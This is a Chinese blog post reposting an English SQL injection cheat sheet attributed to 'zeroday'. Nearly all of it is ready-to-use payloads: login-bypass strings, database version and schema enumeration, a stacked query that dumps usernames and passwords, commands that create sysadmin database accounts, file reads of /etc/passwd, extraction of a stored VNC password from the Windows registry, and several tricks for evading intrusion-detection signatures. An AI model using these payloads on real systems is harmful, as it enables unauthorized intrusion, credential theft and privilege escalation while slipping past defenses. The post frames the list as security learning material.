应用安全之SQL注射技术

下面介绍一下应用安全方面东东......也是检验应用健壮性的某方面安全考虑！下面是一老外针对sql注入技术的总结，看完后相信对依赖注入会有个相对全面的认识！下面一篇英文版的技术总结！本人也比较倾向于看一些关于英文的技术文章，一方面可以锻炼自己的应用文案的阅读能力!也建议大伙看一些英文版的技术文案，当然也不能说“咱崇洋媚外”，国外的一些“大牛"总结的一些东西确实值得我们学习和分享！下面内容希望对在方面有”盲点“朋友有所帮助(下面英文相对简单，有一定计算机基础英语的朋友阅读起来应该不是很难，在这里就不翻译了，多看英文文案有利无害.....)：

SqlInjection Paper

By zeroday.

zeroday [ at ] blacksecurity.org

1.Introduction.

2.Testingfor vulnerabilities.

3.GatheringInformation.

4.Datatypes.

5.GrabbingPasswords.

6.CreateDB accounts.

7.MySQLOS Interaction.

8.Servername and config.

9.RetrievingVNC password from registry.

10.IDSSignature Evasion.

11.mySQLInput Validation Circumvention using Char().

12.IDSSignature Evasion using comments.

13.Stringswithout quotes.

1. When a box only has port 80 open, it'salmost certain the admin will patch his server,

The best thing to turn to is web attacks.Sql Injection is one of the most common web attacks.

You attack the web application, ( ASP, JSP,PHP, CGI..etc) rather than the webserver

or the services running on the OS.

Sql injection is a way to trick using aqurey or command as a input via webpages,

most websites take parameters from the userlike username and passwrod or even their emails.

They all use Sql querys.

2. First of you should start with somethingsimple.

- Login:' or 1=1--

- Pass:' or 1=1--

- http://website/index.asp?id=' or 1=1--

These are simple ways to try another onesare:

- ' having 1=1--

- ' group by userid having 1=1--

- ' SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablename')--

- ' union select sum(columnname) fromtablename--

3.Gathering Infomation.

- ' or 1 in (select @@version)--

- ' union all select @@version--

Those will Find the actual Version of thecomputer, OS/service pack.

4.Data types.

Oracle

-->SYS.USER_OBJECTS (USEROBJECTS)

-->SYS.USER_VIEWS

-->SYS.USER_TABLES

-->SYS.USER_VIEWS

-->SYS.USER_TAB_COLUMNS

-->SYS.USER_CATALOG

-->SYS.USER_TRIGGERS

-->SYS.ALL_TABLES

-->SYS.TAB

MySQL

-->mysql.user

-->mysql.host

-->mysql.db

MS access

-->MsysACEs

-->MsysObjects

-->MsysQueries

-->MsysRelationships

MS SQL Server

-->sysobjects

-->syscolumns

-->systypes

-->sysdatabases

5.Grabbing passwords

'; begin declare @var varchar(8000) set@var=':' select @var=@var+'+login+'/'+password+' ' from users where login >@var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --

6.Create DB accounts.

MS SQL

exec sp_addlogin 'name' , 'password'

exec sp_addsrvrolemember 'name' ,'sysadmin'

MySQL

INSERT INTO mysql.user (user, host,password) VALUES ('name', 'localhost', PASSWORD('pass123'))

Access

CRATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)

CRATE USER name WITH PASSWORD 'pass123'

Oracle

CRATE USER name IDENTIFIED BY pass123

TEMPORARY TABLESPACE temp

DEFAULT TABLESPACE users;

GRANT CONNECT TO name;

GRANT RESOURCE TO name;

7.MySQL OS Interaction

- ' union select1,load_file('/etc/passwd'),1,1,1;

8.Server name and config.

- ' and 1 in (select @@servername)--

- ' and 1 in (select servername from master.sysservers)--

9.Retrieving VNC password from registry.

- '; declare @out binary(8)

- exec master..xp_regread

- @rootkey = 'HKEY_LOCAL_MACHINE',

- @key = 'SOFTWARE\ORL\WinVNC3\Default',

- @value_name='password',

- @value = @out output

- select cast (@out as bigint) as x intoTEMP--

- ' and 1 in (select cast(x as varchar) from temp)--

10.IDS Signature Evasion.

Evading ' OR 1=1 Signature

- ' OR 'unusual' = 'unusual'

- ' OR 'something' = 'some'+'thing'

- ' OR 'text' = N'text'

- ' OR 'something' like 'some%'

- ' OR 2 > 1

- ' OR 'text' > 't'

- ' OR 'whatever' in ('whatever')

- ' OR 2 BETWEEN 1 and 3

11.mySQL Input Validation Circumventionusing Char().

Inject without quotes (string ="%"):

--> ' or username like char(37);

Inject with quotes(string="root"):

--> ' union select * from users wherelogin = char(114,111,111,116);

load files in unions (string ="/etc/passwd"):

-->' union select1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;

Check for existing files (string ="n.ext"):

-->' and 1=(if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

12.IDS Signature Evasion using comments.

-->'/**/OR/**/1/**/=/**/1

-->Username:' or 1/*

-->Password:*/=1--

-->UNI/**/ON SEL/**/ECT

-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' ||'ER'

-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')

13.Strings without quotes.

-->INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) +char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) +char(0x65) + char(0x72), 0x64)